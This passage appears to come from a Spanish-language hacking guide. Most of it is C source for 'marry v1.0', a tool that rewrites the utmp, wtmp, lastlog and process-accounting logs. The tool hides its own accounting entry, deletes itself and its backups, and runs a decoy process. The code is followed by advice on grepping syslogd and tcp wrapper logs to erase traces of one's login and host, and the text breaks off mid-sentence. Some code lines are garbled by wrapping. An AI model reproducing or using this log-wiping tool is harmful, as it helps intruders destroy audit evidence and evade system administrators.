  10609.     close(fo);
  10610.     close(fi);
  10611.     free(buf);
  10612.     return 1;
  10613. }
  10614.  
  10615. bool backup(src)
  10616. char *src;
  10617. {
  10618.     printf("backup = %s\n", a_Backup);
  10619.     fflush(stdout);
  10620.     return copyf(src, a_Backup);
  10621. }
  10622.  
  10623. char *match_s(haystack, needle, n)
  10624. char *haystack;
  10625. char *needle;
  10626. int n;
  10627. {
  10628. static char tmp[256];
  10629.     strncpy(tmp, haystack, n>sizeof(tmp)? sizeof(tmp): n);
  10630.     return strstr(tmp, needle);
  10631. }
  10632.  
  10633. unsigned short atoi2(s)
  10634. char *s;
  10635. {
  10636.     return (s[0]-'0')*10+(s[1]-'0');
  10637. }
  10638.  
  10639. char *p_string(s, size)
  10640. char *s;
  10641. int size;
  10642. {
  10643. static char sss[1024];
  10644. register int n;
  10645. char *ss=sss;
  10646.     if (!*s) return quotes;
  10647.     
  10648.     for (n=0; n<size; n++)
  10649.     {
  10650.         char c=s[n];
  10651.         switch (c)
  10652.         {
  10653.         case '\\':
  10654.             *(ss++)=c;
  10655.             break;
  10656.         case ' ':
  10657.             *(ss++)='\\';
  10658.             break;
  10659.         case '\t':
  10660.             *(ss++)='\\';
  10661.             c='t';
  10662.             break;
  10663.         case '\n':
  10664.             *(ss++)='\\';
  10665.             c='n';
  10666.             break;
  10667.         case '\r':
  10668.             *(ss++)='\\';
  10669.             c='r';
  10670.             break;
  10671.         case 0:
  10672.             goto end;
  10673.         }
  10674.         *(ss++)=c;
  10675.     }
  10676. end:
  10677.     *ss=0;
  10678.     return sss;
  10679. }
  10680.  
  10681. char *skip_white(s)
  10682. char *s;
  10683. {    for (; *s && (*s=='\t' || *s==' '); s++);
  10684.     if (!*s || (*s=='\n')) return NULL;
  10685.     return s;
  10686. }
  10687.  
  10688. char *g_string(d, s, size)
  10689. char *d;
  10690. char *s;
  10691. int size;
  10692. {
  10693. int y;
  10694. char c;
  10695. char f_esc=0;
  10696.     for (y=0; y<size; y++) d[y]=0;
  10697.     if (!(s=skip_white(s))) return NULL;
  10698.     if (*s=='"' && *(s+1)=='"') return s+2;
  10699.     for (y=0; y<size; s++)
  10700.     {
  10701.         c=*s;
  10702.         if (f_esc)
  10703.         {
  10704.             switch(c)
  10705.             {
  10706.             case 'r':
  10707.                 c='\r';
  10708.                 break;
  10709.             case 'n':
  10710.                 c='\n';
  10711.                 break;
  10712.             case 't':
  10713.                 c='\t';
  10714.                 break;
  10715.             }
  10716.             f_esc=0;
  10717.         } else {
  10718.             switch(c)
  10719.             {
  10720.             case '\\':
  10721.                 f_esc=1;
  10722.                 continue;
  10723.             case ' ':
  10724.             case '\t':
  10725.             case '\n':
  10726.             case '\0':
  10727.                 goto end;
  10728.             }
  10729.         }
  10730.         d[y++]=c;
  10731.     }
  10732. end:
  10733.     return s+1;
  10734. }
  10735.  
  10736. char *time_s(tt)
  10737. time_t tt;
  10738. {
  10739. static char s[13];
  10740.     time_t t=tt; /* some compilers won't take a parameter address */
  10741.     struct tm *tp;
  10742.     tp=localtime(&t);
  10743.     sprintf(s, "%02d%02d%02d%02d%02d%02d",
  10744.         tp->tm_year, tp->tm_mon+1, tp->tm_mday,
  10745.         tp->tm_hour, tp->tm_min, tp->tm_sec);
  10746.     return s;
  10747. }
  10748.  
  10749. time_t time_i(s)
  10750. char *s;
  10751. {
  10752.     struct tm lt;
  10753.     time_t t;
  10754.     if (strlen(s)!=12) return (time_t)-1;
  10755.     time(&t);
  10756.     lt=*localtime(&t);
  10757.     lt.tm_year=atoi2(s);
  10758.     lt.tm_mon=atoi2(s+2)-1;
  10759.     lt.tm_mday=atoi2(s+4);
  10760.     lt.tm_hour=atoi2(s+6);
  10761.     lt.tm_min=atoi2(s+8);
  10762.     lt.tm_sec=atoi2(s+10);
  10763.     lt.tm_isdst=-1;
  10764.     return mktime(<);
  10765. }
  10766.  
  10767. char *
  10768. bgetgrgid(u)
  10769. gid_t u;
  10770. {
  10771. struct group *gr;
  10772.     if (!gida)
  10773.     {
  10774.         int n;
  10775.         gida=(char **)Smalloc(sizeof(char *)*MAX_UID);
  10776.         for (n=0; n<MAX_UID; n++) gida[n]=NULL; 
  10777.     }
  10778.     if (gida[u]==(char *)-1) return NULL;
  10779.     if (gida[u]) return gida[u];
  10780.     if (!(gr=getgrgid(u))) 
  10781.     {
  10782.         gida[u]=(char *)-1;
  10783.         return NULL;
  10784.     }
  10785.     gida[u]=Smalloc(strlen(gr->gr_name)+1);
  10786.     strcpy(gida[u], gr->gr_name);
  10787.     return gida[u];
  10788. }
  10789.  
  10790. char *
  10791. bgetpwuid(u)
  10792. uid_t u;
  10793. {
  10794. struct passwd *pw;
  10795.     if (!uida)
  10796.     {
  10797.         int n;
  10798.         uida=(char **)Smalloc(sizeof(struct passwd *)*MAX_UID);
  10799.         for (n=0; n<MAX_UID; n++) uida[n]=NULL; 
  10800.     }
  10801.     if (uida[u]==(char *)-1) return NULL;
  10802.     if (uida[u]) return uida[u];
  10803.     if (!(pw=getpwuid(u))) 
  10804.     {
  10805.         uida[u]=(char *)-1;
  10806.         return NULL;
  10807.     }
  10808.     uida[u]=Smalloc(strlen(pw->pw_name)+1);
  10809.     strcpy(uida[u], pw->pw_name);
  10810.     return uida[u];
  10811. }
  10812.  
  10813. #ifdef UTMP
  10814. bool dump_utmp(uline, ut)
  10815. int uline;
  10816. struct S_UTMP *ut;
  10817. {
  10818.     time_t tim;
  10819.     if (a_Pattern)
  10820.     {
  10821.         if (!match(ut->ut_user, a_Pattern) &&
  10822.             !match(ut->ut_line, a_Pattern)
  10823. #ifdef UT_HOST
  10824.             && !match(ut->UT_HOST, a_Pattern)
  10825. #endif
  10826.             ) {if (!f_Exclude) return 1;}
  10827.         else if (f_Exclude) return 1;
  10828.      }
  10829.     fprintf(afh, "%05x", uline-1);
  10830.     fprintf(afh, " %-8s", p_string(ut->ut_user, sizeof(ut->ut_user)));
  10831.     fprintf(afh, " %-11s", p_string(ut->ut_line, sizeof(ut->ut_line)));
  10832. #ifdef UT_ID
  10833.     fprintf(afh, " %-4s", p_string(ut->UT_ID, sizeof(ut->UT_ID)));
  10834. #endif
  10835. #ifdef UT_TYPE
  10836.     fprintf(afh, " %-2x", ut->UT_TYPE);
  10837. #endif
  10838. #ifdef UT_PID
  10839.     fprintf(afh, " %-5d", (int)ut->UT_PID);
  10840. #endif
  10841. #if defined(UT_TIME) || defined (UT_TV)
  10842. #  ifdef UT_TIME
  10843.     tim=ut->UT_TIME;
  10844. #  else
  10845.     tim=ut->UT_TV.tv_sec;
  10846. #  endif
  10847.     fprintf(afh, " %s", time_s(tim));
  10848. #endif
  10849. #ifdef UT_ADDR
  10850.     fprintf(afh, " %-15s", inet_ntoa(*((struct in_addr *)&ut->UT_ADDR)));
  10851. #endif
  10852. #ifdef UT_HOST
  10853.     fprintf(afh, " %s", p_string(ut->UT_HOST, sizeof(ut->UT_HOST)));
  10854. #endif
  10855.     fputc('\n', afh);
  10856.     return 1;
  10857. }
  10858. #endif
  10859.  
  10860. #ifdef LASTLOG
  10861. bool dump_lastlog(uline, ll)
  10862. int uline;
  10863. struct lastlog *ll;
  10864. {
  10865.     char *name;
  10866.     struct passwd *pw;
  10867.     if (f_Uid) 
  10868.     {
  10869.         pw=getpwuid(uline-1);
  10870.         name=pw? pw->pw_name: quotes;
  10871.     } else
  10872.     {
  10873.       static char s[6];
  10874.           sprintf(s, "%05d", uline-1);
  10875.         name=s;
  10876.     }
  10877.     if (a_Pattern)
  10878.     {
  10879.         if (
  10880.             (!uid || (uid->pw_uid!=(uline-1))) &&
  10881.             (!f_Uid || strstr(name, a_Pattern)) &&
  10882. #ifdef LL_HOST
  10883.             !match(ll->ll_host, a_Pattern) &&
  10884. #endif
  10885.             !match(ll->ll_line, a_Pattern)
  10886.             ) {if (!f_Exclude) return 1;}
  10887.         else if (f_Exclude) return 1;
  10888.      }
  10889.     fprintf(afh, "%05x", uline-1);
  10890.     fprintf(afh, " %-8s", name);
  10891.     fprintf(afh, " %-11s", p_string(ll->ll_line, sizeof(ll->ll_line)));
  10892.     fprintf(afh, " %s", time_s(ll->ll_time));
  10893. #ifdef LL_HOST
  10894.     fprintf(afh, " %s", p_string(ll->LL_HOST, sizeof(ll->LL_HOST)));
  10895. #endif
  10896.     fputc('\n', afh);
  10897.     return 1;
  10898. }
  10899. #endif
  10900.  
  10901. #ifdef PACCT
  10902. bool dump_pacct(uline, ac)
  10903. int uline;
  10904. struct acct *ac;
  10905. {
  10906.     char *name;
  10907.     char *gr_name;
  10908.     if (!(name=bgetpwuid(ac->ac_uid)))
  10909.     {
  10910.       static char s[6];
  10911.           sprintf(s, "%05d", ac->ac_uid);
  10912.         name=s;
  10913.     }
  10914.     if (!(gr_name=bgetgrgid(ac->ac_gid)))
  10915.     {
  10916.       static char s[6];
  10917.           sprintf(s, "%05d", ac->ac_gid);
  10918.         gr_name=s;
  10919.     }
  10920.     if (a_Pattern)
  10921.     {
  10922.         if (
  10923.             (!uid || (uid->pw_uid!=ac->ac_uid)) &&
  10924.             (strstr(name, a_Pattern)) &&
  10925.             (strstr(gr_name, a_Pattern))
  10926.             ) {if (!f_Exclude) return 1;}
  10927.         else if (f_Exclude) return 1;
  10928.     }
  10929.     fprintf(afh, "%05x", uline-1);
  10930.     fprintf(afh, " %-8s", name);
  10931.     fprintf(afh, " %-8s", gr_name);
  10932.     fprintf(afh, " %-10s", p_string(ac->ac_comm, sizeof(ac->ac_comm)));
  10933.     if (ac->ac_tty==(dev_t)-1)
  10934.         fputs(" ----", afh);
  10935.     else
  10936.         fprintf(afh, " %04x", ac->ac_tty);
  10937.     fprintf(afh, " %2x", ac->ac_flag);
  10938.     fprintf(afh, " %s", time_s(ac->ac_btime));
  10939.     fputc('\n', afh);
  10940.     return 1;
  10941. }
  10942. #endif
  10943.  
  10944. FVOID makedump()
  10945. {
  10946. int uline;
  10947.     if ((ifh=fopen(a_Input, "r"))==NULL)
  10948.     {
  10949.         perror(a_Input);
  10950.         exit(1);
  10951.     }
  10952.     if ((afh=fopen(a_Dump, "w"))==NULL)
  10953.     {
  10954.         perror(a_Dump);
  10955.         exit(1);
  10956.     }
  10957.     fputc('\n', stdout);
  10958.     globline=0;
  10959.     mes="entries disassembled: ";
  10960.     for (uline=1; fread(mode_data, mode_size, 1, ifh)>0; uline++)
  10961.     {
  10962.         display();
  10963.         switch(mode)
  10964.         {
  10965. #ifdef UTMP
  10966.         case 'W':
  10967.             dump_utmp(uline, mode_data);
  10968.             break;
  10969. #endif
  10970. #ifdef LASTLOG
  10971.         case 'L':
  10972.             dump_lastlog(uline, mode_data);
  10973.             break;
  10974. #endif
  10975. #ifdef PACCT
  10976.         case 'A':
  10977.             dump_pacct(uline, mode_data);
  10978.             break;
  10979. #endif
  10980.         }
  10981.     }
  10982.     display_end();
  10983.     fclose(afh);
  10984.     fclose(ifh);
  10985. }
  10986.  
  10987. int seek_ifh(uline)
  10988. int uline;
  10989. {
  10990.     if (ftell(ifh)!=mode_size*(uline-1))
  10991.         if (fseek(ifh, mode_size*(uline-1), SEEK_SET)==-1)
  10992.             return 0;
  10993.     return 1;
  10994. }
  10995.  
  10996. #ifdef UTMP
  10997. int mod_utmp(ut, p)
  10998. struct S_UTMP *ut;
  10999. char *p;
  11000. {
  11001.     char *op;
  11002. static char tmp[255];
  11003. #if defined(UT_TIME) || defined(UT_TV)
  11004. #endif
  11005.     op=p;
  11006.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11007.     if (!(p=g_string(ut->ut_user, p, sizeof(ut->ut_user)))) return 0;
  11008.     if (!(p=g_string(ut->ut_line, p, sizeof(ut->ut_line)))) return 0;
  11009. #ifdef UT_ID
  11010.     if (!(p=g_string(ut->UT_ID, p, sizeof(ut->UT_ID)))) return 0;
  11011. #endif
  11012. #ifdef UT_TYPE
  11013.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11014.     sscanf(tmp, "%x", (unsigned int *)&(ut->UT_TYPE));
  11015. #endif
  11016. #ifdef UT_PID
  11017.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11018.     ut->UT_PID=atoi(tmp);
  11019. #endif
  11020. #if defined(UT_TIME) || defined(UT_TV)
  11021.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11022. #  ifdef UT_TIME
  11023.     if ((ut->UT_TIME=time_i(tmp))==(time_t)-1)
  11024. #  else /* UT_TV */
  11025.     if ((ut->UT_TV.tv_sec=time_i(tmp))==(time_t)-1)
  11026. #  endif
  11027.         fprintf(stderr, "warning: invalid time spec %s", op);
  11028. #endif
  11029. #ifdef UT_ADDR
  11030.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11031.     ut->UT_ADDR=inet_addr(tmp);
  11032. #endif
  11033. #ifdef UT_HOST
  11034.     if (!(p=g_string(ut->UT_HOST, p, sizeof(ut->UT_HOST)))) return 0;
  11035. #endif
  11036.     return 1;
  11037. }
  11038. #endif
  11039.  
  11040. #ifdef LASTLOG
  11041. int mod_lastlog(ll, p)
  11042. struct lastlog *ll;
  11043. char *p;
  11044. {
  11045.     char *op;
  11046. static char tmp[255];
  11047.     op=p;
  11048.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; 
  11049.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; /*skip name*/
  11050.     if (!(p=g_string(ll->ll_line, p, sizeof(ll->ll_line)))) return 0;
  11051.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11052.     if ((ll->ll_time=time_i(tmp))==(time_t)-1)
  11053.         fprintf(stderr, "warning illegal time: %s\n", op);
  11054. #ifdef LL_HOST
  11055.     if (!(p=g_string(ll->ll_host, p, sizeof(ll->ll_host)))) return 0;
  11056. #endif
  11057.     return 1;
  11058. }
  11059. #endif
  11060.  
  11061. #ifdef PACCT
  11062. int mod_pacct(ac, p)
  11063. struct acct *ac;
  11064. char *p;
  11065. {
  11066. static char tmp[255];
  11067. struct passwd *pw;
  11068. struct group *gr;
  11069. char *op;
  11070. long int t;
  11071. unsigned int tu;
  11072.     op=p;
  11073.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; 
  11074.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; 
  11075.     if (sscanf(tmp, "%ld", &t)!=1)
  11076.     {
  11077.         if (!(pw=getpwnam(tmp)))
  11078.             fprintf(stderr, "warning: unknown username %s\n", op);
  11079.         else
  11080.             ac->ac_uid=pw->pw_uid;
  11081.     } else ac->ac_uid=t;
  11082.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; 
  11083.     if (sscanf(tmp, "%ld", &t)!=1)
  11084.     {
  11085.         if (!(gr=getgrnam(tmp)))
  11086.             fprintf(stderr, "warning: unknown group %s\n", op);
  11087.         else
  11088.             ac->ac_gid=pw->pw_gid;
  11089.     } else ac->ac_gid=t;
  11090.     if (!(p=g_string(ac->ac_comm, p, sizeof(ac->ac_comm)))) return 0;
  11091.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11092.     if (sscanf(tmp, "%x", &tu)!=1) ac->ac_tty=(dev_t)-1;
  11093.     else ac->ac_tty=tu;
  11094.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11095.     if (sscanf(tmp, "%x", &tu)!=1)
  11096.         fprintf(stderr, "warning: invalid flags %s\n", op);
  11097.     else ac->ac_flag=tu;
  11098.     if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
  11099.     if ((ac->ac_btime=time_i(tmp))==(time_t)-1)
  11100.         fprintf(stderr, "warning: illegal time: %s\n", op);
  11101.     return 1;
  11102. }
  11103. #endif
  11104.  
  11105. bool wcopy(uline)
  11106. int uline;
  11107. {
  11108.     if (!seek_ifh(uline)) return 0;
  11109.     while (fread(mode_data, mode_size, 1, ifh)>0)
  11110.     {
  11111.         display();
  11112. #ifdef PACCT
  11113.         if (f_Security && f_Auto && mode=='A')
  11114.         {
  11115.             struct acct *p; 
  11116.             p=(struct acct *)mode_data;
  11117.             if (!strncmp(p->ac_comm, ac_comm_hide, 
  11118. sizeof(ac_comm_hide)))
  11119.             {
  11120.                 ac_saved.ac_btime=p->ac_btime;
  11121.                 *p=ac_saved;
  11122.             }
  11123.         }
  11124. #endif
  11125.         if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
  11126.     }
  11127. #ifndef NO_FTRUNCATE
  11128.     if (f_Squeeze && f_EditSrc) ftruncate(fileno(ofh), ftell(ofh));
  11129. #endif
  11130.     return 1;
  11131. }
  11132.  
  11133. bool domod(p)
  11134. char *p;
  11135. {
  11136. bool ret=0;
  11137.     if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
  11138.     switch(mode)
  11139.     {
  11140. #ifdef UTMP
  11141.     case 'W':
  11142.         ret=mod_utmp(mode_data, p);
  11143.         break;
  11144. #endif
  11145. #ifdef LASTLOG
  11146.     case 'L':
  11147.         ret=mod_lastlog(mode_data, p);
  11148.         break;
  11149. #endif
  11150. #ifdef PACCT
  11151.     case 'A':
  11152.         ret=mod_pacct(mode_data, p);
  11153.         break;
  11154. #endif
  11155.     }
  11156.     if (!ret)
  11157.         fprintf(stderr, "warning: invalid dump input `%s'\n", p);
  11158.     return 1;
  11159. }
  11160.  
  11161. static wu_line=0;
  11162.  
  11163. int obj_update(uline, p, f_mod)
  11164. int uline;
  11165. char *p;
  11166. char f_mod;
  11167. {
  11168.     if (f_Squeeze)
  11169.     {
  11170.         display();
  11171.         seek_ifh(uline);
  11172.         if (f_mod) {if (!domod(p)) return 0;}
  11173.         else if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
  11174.         if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
  11175.     } else {
  11176.         if (f_EditSrc)
  11177.         {
  11178.             if (f_mod)
  11179.                 fseek(ofh, mode_size*(uline-1), SEEK_SET);
  11180.         } else {
  11181.             while(++wu_line<uline)
  11182.             {
  11183.                 display();
  11184.                           if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
  11185.                          if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
  11186.             }
  11187.         }
  11188.         if (f_mod)
  11189.         {
  11190.             seek_ifh(uline);
  11191.             if (!domod(p)) return 0;
  11192.             if (f_mod==2) wu_line--; 
  11193.         } else if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
  11194.         if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
  11195.         display();
  11196.     }
  11197. #ifdef PACCT
  11198.     if (f_Security && f_Auto && !f_mod && mode=='A')
  11199.         if (!uline%acct_step) ac_saved=*(struct acct *)mode_data;
  11200. #endif
  11201.     return 1;
  11202. }
  11203.  
  11204. FVOID makeobject()
  11205. {
  11206. int uline=1;
  11207. char line[1024];
  11208. char *p;
  11209. char f_mod;
  11210.     if ((ifh=fopen(a_Input, "r"))==NULL)
  11211.     {
  11212.         perror(a_Input);
  11213.         exit(1);
  11214.     }
  11215.     if ((afh=fopen(a_Dump, "r"))==NULL)
  11216.     {
  11217.         perror(a_Dump);
  11218.         exit(1);
  11219.     }
  11220.     if ((ofh=fopen(a_Output, f_EditSrc? "r+": "w"))==NULL)
  11221.     {
  11222.         perror(a_Output);
  11223.         exit(1);
  11224.     }
  11225. #ifdef PACCT
  11226.     if (f_Security && f_Auto && mode=='A')
  11227.         acct_step=(getpid()+8)%60;
  11228. #endif
  11229.     fputc('\n', stdout);
  11230.     globline=0;
  11231.     mes="entries assembled: ";
  11232.     while (1)
  11233.     {
  11234.         if (!fgets((p=line), sizeof(line), afh)) 
  11235.         {
  11236.             if (f_EditSrc)
  11237.             {
  11238. #ifndef NO_FTRUNCATE
  11239.                 if (f_Truncate)
  11240.                 {
  11241.                     fflush(ofh);
  11242.                                       ftruncate(fileno(ofh), uline*mode_size);
  11243.                 }
  11244. #endif
  11245.                 goto closeup;
  11246.             }
  11247.             if (!f_Truncate) wcopy(uline+1);
  11248.             goto closeup;
  11249.         }
  11250.         switch (*p)
  11251.         {
  11252.         case 0:
  11253.         case '#':
  11254.         case '\n':
  11255.             continue;
  11256.         case '=': 
  11257.             f_mod=1; 
  11258.             p++; 
  11259.             break;
  11260.         case '+':
  11261.             if (f_EditSrc)
  11262.             {
  11263.                 if (f_Squeeze)
  11264.                                  fprintf(stderr, "warning: the + operator can 
  11265. have \
  11266. unpredictable effects when used in conbination with -e and -s\n");
  11267.                 else
  11268.                 {
  11269.                                fprintf(stderr, "error: + operator used with -
  11270. e\n");
  11271.                     exit(1);
  11272.                 }
  11273.             }
  11274.             f_mod=2;
  11275.             p++;
  11276.             break;
  11277.         default: {f_mod=0; break;}
  11278.         }
  11279.         if (sscanf(p, "%x", &uline)!=1)
  11280.         {
  11281.             perror("invalid line number in ascii input");
  11282.             exit(1);
  11283.         }
  11284.         uline++;
  11285.         if (!obj_update(uline, p, f_mod))
  11286.          {
  11287.             perror("read/write failed");
  11288.             exit(1);
  11289.         }
  11290.     }
  11291. closeup:
  11292.     display_end();
  11293.     fclose(ofh);
  11294.     fclose(ifh);
  11295.     fclose(afh);
  11296. }
  11297.  
  11298. FVOID usage(s)
  11299. char *s;
  11300. {
  11301. fprintf(stderr, "usage: %s\t[-aetsuScDn] [-i src] [-o obj] [-d dump] [-p pat]
  11302.    [-v pat] [-m [WLA]]\n\
  11303. \t\t[-E editor] [-h program]\n", s);
  11304.     exit(1);
  11305. }
  11306.  
  11307. int main(argc, argv)
  11308. int argc;
  11309. char **argv;
  11310. {
  11311.     char *ed;
  11312.     char c;
  11313. #ifdef PACCT
  11314.     mode='A';
  11315. #endif
  11316. #ifdef LASTLOG
  11317.     mode='L';
  11318. #endif
  11319. #ifdef UTMP
  11320.     mode='W';
  11321. #endif
  11322.  
  11323.     puts("marry v1.0 (c) 1991 -- Proff -- All rights reserved.");
  11324.     umask(022);
  11325.     while ((c=getopt(argc, argv, "i:o:d:aetsp:v:m:uScDnE:h:b:"))!=-1)
  11326.     switch(c)
  11327.     {
  11328.         case 'i':
  11329.             a_Input=optarg;
  11330.             break;
  11331.         case 'o':
  11332.             a_Output=optarg;
  11333.             break;
  11334.         case 'd':
  11335.             a_Dump=optarg;
  11336.             break;
  11337.         case 'a':
  11338.             f_Auto=1;
  11339.             break;
  11340.         case 'e':
  11341.             f_EditSrc=1;
  11342.             break;
  11343.         case 't':
  11344.             f_Truncate=1;
  11345.             break;
  11346.         case 's':
  11347.             f_Squeeze=1;
  11348.             break;
  11349.         case 'p':
  11350.             a_Pattern=optarg;
  11351.             break;
  11352.         case 'v':
  11353.             f_Exclude=1;
  11354.             a_Pattern=optarg;
  11355.             break;
  11356.         case 'm':
  11357.             mode=*optarg;
  11358.             break;
  11359.         case 'u':
  11360.             f_Uid=1;
  11361.             break;
  11362.         case 'S':
  11363.             f_Security=1;
  11364.             break;
  11365.         case 'c':
  11366.             f_Clean=1;
  11367.             break;
  11368.         case 'D':
  11369.             f_DeleteSelf=1;
  11370.             break;
  11371.         case 'n':
  11372.             f_NoBackups=1;
  11373.             break;
  11374.         case 'E':
  11375.             a_Editor=optarg;
  11376.             break;
  11377.         case 'h':
  11378.             a_Hide=optarg;
  11379.             break;
  11380.         case 'b':
  11381.             a_Backup=optarg;
  11382.             break;
  11383.         case '?':
  11384.         default:
  11385.                     fprintf(stderr, "%s: unknown option `%c'\n", argv[0], c);
  11386.             usage(argv[0]);
  11387.             /* NOT_REACHED */
  11388.     }
  11389.     if (a_Output && f_EditSrc)
  11390.     {
  11391.         perror("can't have -o and -e together");
  11392.         exit(1);
  11393.     }
  11394.     switch(mode)
  11395.     {
  11396. #ifdef UTMP
  11397.     case 'W':
  11398.         mode_size=sizeof(struct S_UTMP);
  11399.         mode_data=&s_utmp;
  11400.         if (!a_Input) a_Input=WTMP_FILE;
  11401.         break;
  11402. #endif
  11403. #ifdef LASTLOG
  11404.     case 'L':
  11405.         mode_size=sizeof(struct lastlog);
  11406.         mode_data=&s_lastlog;
  11407.         if (!a_Input) a_Input=LASTLOG_FILE;
  11408.         break;
  11409. #endif
  11410. #ifdef PACCT
  11411.     case 'A':
  11412.         mode_size=sizeof(struct acct);
  11413.         mode_data=&s_acct;
  11414.         if (!a_Input) a_Input=PACCT_FILE;
  11415.         break;
  11416. #endif
  11417.         default:
  11418.         fprintf(stderr, "unknown mode `%c'\n", mode);
  11419.         usage();
  11420.         /*NOT_REACHED*/
  11421.     }
  11422.     if (a_Pattern) uid=getpwnam(a_Pattern);
  11423.     if (uid) {uid_s=*uid; uid=&uid_s;}
  11424.     if (f_Auto)
  11425.     {
  11426.     struct stat st1, st2;
  11427.     int pid;
  11428.     int ws;
  11429.         if (stat(a_Editor, &st1))
  11430.         {
  11431.             fprintf(stderr, "error: editor `%s' must exist with -a (check -E 
  11432. value)\n", a_Editor);
  11433.             exit(1);
  11434.         }
  11435.         makedump();
  11436.         if (f_Security)
  11437.         {
  11438.             sprintf(ac_comm_hide, "m%d", getpid());
  11439.             symlink(a_Editor, ac_comm_hide);
  11440.             ed=ac_comm_hide;
  11441.         } else  ed=a_Editor;
  11442.  
  11443.         stat(a_Dump, &st1);
  11444.         if (!(pid=fork()))
  11445.         {
  11446.             printf("%s %s\n", ed, a_Dump);
  11447.             fflush(stdout);
  11448.             execlp(ed, ed, a_Dump, 0);
  11449.             perror(ed);
  11450.             _exit(1);
  11451.         }
  11452.         if (pid<0)
  11453.         {
  11454.             perror("fork");
  11455.             exit(1);
  11456.         }
  11457.         while (wait(&ws)!=pid);
  11458.         if (f_Security)
  11459.             unlink(ac_comm_hide);
  11460.         stat(a_Dump, &st2);
  11461.         if (st1.st_mtime==st2.st_mtime)
  11462.         {
  11463.                    fprintf(stderr, "`%s' not modified -- aborted\n", a_Dump);
  11464.             exit(1);
  11465.         }
  11466.         if (!a_Output || !strcmp(a_Input, a_Output))
  11467.         {
  11468.             backup(a_Input);
  11469.             f_backedup=1;
  11470.             if (!a_Output) a_Output=a_Input;
  11471.             if (!f_EditSrc)
  11472.                 a_Input=a_Backup;
  11473.         }
  11474.         makeobject();
  11475.         if (f_Clean)
  11476.             unlink(a_Dump);
  11477.         if ((f_Clean || f_NoBackups) && f_backedup) unlink(a_Backup);
  11478.     }
  11479.     else if (a_Output)
  11480.         {
  11481.             if (!strcmp(a_Input, a_Output))
  11482.             {
  11483.                 backup(a_Input);
  11484.                 f_backedup=1;
  11485.                 if (!f_EditSrc)
  11486.                     a_Input=a_Backup;
  11487.             }
  11488.             makeobject();
  11489.             if (f_Clean)
  11490.                 unlink(a_Dump);
  11491.             if ((f_Clean || f_NoBackups) && f_backedup) 
  11492. unlink(a_Backup);
  11493.         } else
  11494.             makedump();
  11495.     if (f_DeleteSelf) unlink(argv[0]);
  11496.     puts("Done.");
  11497.     if (f_Security)
  11498.     {
  11499.         close(0);
  11500.         close(1);
  11501.         close(2);
  11502.         setsid();
  11503.         if (a_Hide)
  11504.         {
  11505.             execlp(a_Hide, a_Hide, 0);
  11506.             perror(a_Hide);
  11507.         }
  11508.         if (f_Security)
  11509.             kill(getpid(), SIGKILL);
  11510.     }
  11511.     exit(0);
  11512. }
  11513.  
  11514. ------------ FIN -------------------------------------------------------------
  11515.  
  11516.         Bien, con estos programitas hemos conseguido borrar los logs mas
  11517.   usuales (utmp, wtmp, lastlog y acct) pero tambien hemos de tener en cuenta
  11518.   otros que pueden aparecer que se comentan a continuacion:
  11519.  
  11520.         El demonio syslogd que guarda informacion en distintos archivos
  11521.   indicados en el /etc/syslogd.conf aunque puede estar en otras ubicaciones.
  11522.   La ventaja que tiene el log creado por el syslogd sobre los otros es que
  11523.   mientras que tanto el utmp, wtmp, lastlog y acct tienen estructura de datos
  11524.   por lo que no se pueden modificar con un editor de textos normalmente
  11525.   (aunque tampoco ofrece grandes complicaciones), los ficheros producidos por
  11526.   el daemon syslogd si que son editables en modo texto por lo que usando el
  11527.   grep con un poco de gracia deberiamos borrar la mayoria de las huellas, es
  11528.   decir buscar en modo texto mensajes que pueden referir a nuestra conexion,
  11529.   por ejemplo podemos buscar el nombre de la maquina desde la que hemos
  11530.   conectado, nuestro login ,etc.
  11531.  
  11532.         A continuacion indico como funciona el syslogd.conf. Algunos de los
  11533.   tipos de procesos que pueden general mensajes son los siguientes:
  11534.  
  11535.   kern --> mensajes relativos al kernel
  11536.   user --> mensajes relativos a procesos ejecutados por usuarios normales.
  11537.   mail --> mensajes relativos al sistema de correo.
  11538.   lpr -->  mensajes relativos a impresoras.
  11539.   auth --> mensajes relativos a programas y procesos de autentificacion 
  11540.   (aquellos en los que estan involucrados nombres de usuarios y passwords, por 
  11541.   ejemplo login, su, getty, etc)
  11542.   daemon --> mensajes relativos a otros demonios del sistema.
  11543.  
  11544.         Mientras que pueden generar mensajes de los siguientes tipos:
  11545.  
  11546.   emerg --> emergencias graves.
  11547.   alert --> problemas que deben ser solucionados con urgencia.
  11548.   crit --> errores criticos.
  11549.   err --> errores ordinarios.
  11550.   warning --> avisos.
  11551.   notice --> cuando se da una condicion que no constituye un error pero a la
  11552.              que se le debe dar una cierta atencion.
  11553.   info --> mensajes informativos.
  11554.  
  11555.         Una desventaja que tiene el syslogd es que puede que envie los logs a
  11556.   otra maquina con lo que seran unas huellas dificiles de borrar. Esto no es
  11557.   nada usual pero lo comento para que sepais lo que os podeis encontrar por
  11558.   ahi afuera :o(.
  11559.  
  11560.         En muchos sistemas corre el tcp wrapper que ofrece posibilidades
  11561.   extras como ver que maquinas se pueden conectar o no a una maquina donde
  11562.   este el tcp wrapper instalado a los distintos servicios ( usando el
  11563.   host.allow y el host.deny) y ademas puede ofrecer la posibilidad de
  11564.   establecer logs adicionales. Para controlar y borrar estos logs debes mirar
